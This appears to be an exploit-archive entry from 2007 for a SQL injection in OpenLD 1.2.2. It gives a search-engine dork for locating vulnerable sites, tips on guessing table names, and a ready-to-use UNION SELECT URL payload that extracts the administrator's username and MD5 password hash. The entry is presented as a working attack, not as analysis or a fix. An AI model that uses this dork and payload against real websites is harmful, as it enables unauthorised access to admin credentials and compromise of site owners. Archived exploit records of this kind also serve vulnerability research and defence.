OpenLD <= 1.2.2 (index.php id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : OpenLD <= 1.2.2 (index.php id) Remote SQL Injection Vulnerability
# Published : 2007-07-10
# Author : CypherXero
# Previous Title : vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability
# Next Title : FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion Vulnerability

--==+================================================================================+==--
--==+                       OpenLD  <= 1.2.2 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

NOTES:

The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.

DORK:

"Powered by OpenLD"

EXPLOITS:

http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--

# www.Syue.com [2007-07-10]